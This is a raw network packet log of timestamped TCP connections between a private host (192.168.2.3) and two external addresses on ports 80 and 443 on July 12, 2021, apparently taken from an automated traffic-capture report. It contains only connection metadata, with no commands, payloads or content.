Jul 12, 2021 10:29:49.005275011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005290985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005305052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.005321026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005342960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.005383968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.005814075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005862951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005916119 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006041050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006059885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006098986 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006201029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006220102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006236076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006273031 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006316900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006367922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006402969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006423950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006441116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006457090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006464005 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006498098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006521940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006540060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006588936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006607056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006623983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006634951 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006656885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.006661892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006711006 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.006800890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007035017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007055998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007090092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007108927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007131100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.007148027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007164001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.007175922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007184029 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.007201910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007219076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007241011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007246017 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.007265091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007285118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007289886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.007306099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007319927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.007328987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007344007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007370949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.007889032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.007989883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008008957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008024931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008040905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008049011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008076906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008093119 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008102894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008121014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008136034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008155107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008162975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008182049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008191109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008208990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008215904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008233070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008249044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008285999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008311987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008737087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008758068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008774042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008783102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008805037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.008918047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008936882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.008976936 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009005070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009023905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009041071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009058952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009068012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009082079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009089947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009107113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009123087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009141922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009150028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009177923 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009252071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009270906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009305954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009315014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009332895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009371042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009449959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009845018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009862900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.009888887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009911060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.009967089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010003090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010020971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010037899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010042906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010062933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010078907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010091066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010108948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010128021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010135889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010154009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010170937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010186911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010194063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010212898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010221958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010251045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010284901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010735035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010754108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010791063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010901928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010936975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010946989 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.010963917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010979891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.010998964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011007071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011023998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011034966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011046886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011064053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011080027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011086941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011105061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011125088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011140108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011156082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011172056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011178970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011213064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011689901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011785984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011804104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011820078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011827946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011847973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011856079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.011914015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011933088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.011957884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.012029886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012048006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012063980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012075901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.012105942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012110949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.012128115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012145996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012161970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012173891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.012197018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.012232065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012248039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012265921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012284040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.012295961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.012317896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013128996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013164997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013189077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013211966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013237000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013262987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013276100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013298988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013322115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013338089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013360023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013389111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013401031 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013427973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013452053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013469934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013487101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013509989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013524055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013545036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013587952 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013654947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013721943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013765097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013885021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013910055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013931990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013956070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.013981104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.013992071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014004946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014025927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014049053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014070988 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014084101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014111042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014139891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014147043 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014168024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014190912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014205933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014230013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014236927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014261007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014296055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014592886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014621019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014642954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014669895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014770985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014796972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014818907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014841080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014877081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.014919996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014945984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014972925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.014997005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015023947 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.015048981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.015068054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015089989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015125990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015137911 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.015170097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015192032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015219927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.015229940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015259027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015278101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015335083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.015707016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015913010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015938997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.015968084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016001940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016026974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016041994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016062021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016083956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016097069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016117096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016138077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016158104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016175032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016196966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016212940 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016233921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016263008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016273975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016298056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016321898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016344070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016700029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016743898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016803980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016829967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016853094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016868114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016885996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016911030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016930103 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.016946077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016971111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.016984940 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.017009020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017035007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017050028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.017074108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017096996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017113924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.017128944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017151117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017167091 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.017184019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017225981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.017604113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017894030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017924070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.017959118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.017981052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018006086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018023968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018069029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018091917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018115044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018124104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018148899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018165112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018256903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018282890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018299103 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018320084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018362999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018384933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018409014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018433094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018448114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018465042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018487930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018503904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018582106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.018627882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.018973112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.019001961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.019042015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.098942995 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:49.268121004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.270965099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.326157093 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:49.328341961 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:49.329359055 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:49.558111906 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:49.558141947 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:49.560060978 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:49.596369028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.596960068 CEST	49755	80	192.168.2.3	47.254.186.176
